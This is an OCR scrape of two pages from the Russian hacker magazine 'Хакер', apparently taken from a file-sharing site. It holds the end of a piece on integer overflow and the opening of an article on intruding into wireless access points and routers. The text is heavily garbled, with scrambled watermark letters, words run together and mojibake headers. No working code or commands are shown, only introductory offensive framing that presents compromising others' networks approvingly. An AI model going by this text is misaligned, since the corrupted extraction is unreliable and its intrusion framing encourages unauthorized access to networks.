В стандарте ISO C99 для устранения этой уязвимости рекомендовалось просто использовать в вычислениях Unsigned Integer, однако на практике это нисколько не решает проблемы. Для устранения ошибки Integer Overflow необходимо добавить в код проверки на превышение значений переменных Integer максимального предела.

Эксплойты под эту ошибку, разумеется, существуют, достаточно набрать в www.google.ru «integer overflow exploit» и все увидеть своими глазами.z

/ 067

xàêåð 02 /98/

				hang	e
			C		e		E
		X					E
	-							d
	F								t
	D								i
	D								r
P				NOW!					o
P

w Click				to BUY		>> взлом
w Click										m
w
	w								o
	.							.c
		p					g
			df		n			e
				-xcha

Андрей «Skvoznoy» Комаров

/ admin@cup.su /

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

	О
		перация	»
			»
		-земля
	дух
оз
«В

Нестандартные методы вторжения в беспроводные сети

В прошлых номерах мы рассматривали атаки на точки аутентификации в беспроводных сетях. Весь процесс заключался в компрометации стандартных способов авторизации с помощью WEP/WPA/WPA2/LEAP-ключей. Это демонстрировалось на самых разных объектах, начиная пользовательскими домашними хотспотами и заканчивая оборудованием, расположенным на территории Красной площади :). Сейчас я расскажу тебе о нестандартных методах вторжения практически в любую беспроводную сеть.

Прямаякомпрометация

Атакамис прямойкомпрометациейявляются инциденты, гдеатакующийполучаетинтерактивныйилипривилегированный доступ. Прямая компрометацияпозволяетконтролировать захваченноеоборудованиеи просматривать хранящиеся на компьютере данные. Сказать честно, украстьданныеизбеспроводнойточки

доступаи маршрутизаторадостаточнотрудно, так какихне такужи много:). Ты врядлиобнару- жишьнамашинахплатежныеБДиликакие-либо секретныештучкиПентагона. Самоебольшое, на чтоможнорассчитывать, —это информацияо сетевойтопологии, пароляхи данныхо маршрутах. Применивопределеннуюсмекалку, можноперейтии к отдельнымклиентам, которыепользуются

услугамизахваченногооборудования. Для началавведутебяв курсдела. Из недавнейстатьи «АтаканаКремль» ты узнал, что, обратившись к определенномуадресусети, реальнонайти тосамоеоборудование, которое«питает» всех инетом, и дажепопытатьсяеговзломать. Действительно,это так, при конфигурацииточки доступа, а иногдаи роутера, существуетопция

/ 068	xàêåð 02 /98/ 07

<<< < Предыдущая 1 2 3 4 5 67 / 177 8 9 10 11 12 13 14 15 16 17 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202436.82 Mб12093_Optimized.pdf
#
20.04.202422.64 Mб12094_Optimized.pdf
#
20.04.202463.61 Mб12095_Optimized.pdf
#
20.04.202448.08 Mб12096_Optimized.pdf
#
20.04.202435.47 Mб13097_Optimized.pdf
#
20.04.202456.87 Mб12098_Optimized.pdf
#
20.04.202439.74 Mб12099_Optimized.pdf
#
20.04.202430.69 Mб12100_Optimized.pdf
#
20.04.202427.33 Mб12101_Optimized.pdf
#
20.04.202420.99 Mб12102_Optimized.pdf
#
20.04.202419.26 Mб12103_Optimized.pdf